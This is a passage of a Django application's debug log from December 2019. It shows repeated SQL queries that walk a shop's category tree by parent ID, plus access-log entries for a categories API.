"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:47,888 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:47,891 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:47,894 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:47,896 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:47,900 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:47,904 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:47,908 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:47,911 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:47,915 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:47,919 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:47,925 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:47,929 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:47,932 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:47,936 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:47,940 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:47,944 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:47,949 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:47,953 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:47,957 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:05:47,962 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:05:47,967 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:05:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:05:50,756 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:05:50,763 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:05:50,769 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-16 07:05:50,772 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:05:50,774 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:50,777 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:05:50,782 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:05:50] "GET /api/v1/categories/5 HTTP/1.0" 200 1079 DEBUG 2019-12-16 07:05:50,784 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:05:50,788 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:05:50,791 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:05:50,794 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:05:50,797 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:05:50,800 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:05:50,802 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:05:50,804 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:05:50,806 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:05:50,809 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:05:50,812 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:05:50,814 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:05:50,816 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:05:50,818 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:05:50,822 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:05:50,824 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:05:50,826 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:05:50,828 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:05:50,831 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:05:50,833 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:05:50,836 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:05:50,838 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:05:50,841 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:05:50,843 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:05:50,845 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:05:50,849 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:05:50,851 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:05:50,853 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:05:50,855 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:05:50,857 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:05:50,862 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:05:50,864 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:05:50,866 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:05:50,869 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:05:50,871 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:05:50,873 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:05:50,877 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:05:50,881 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:05:50,884 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 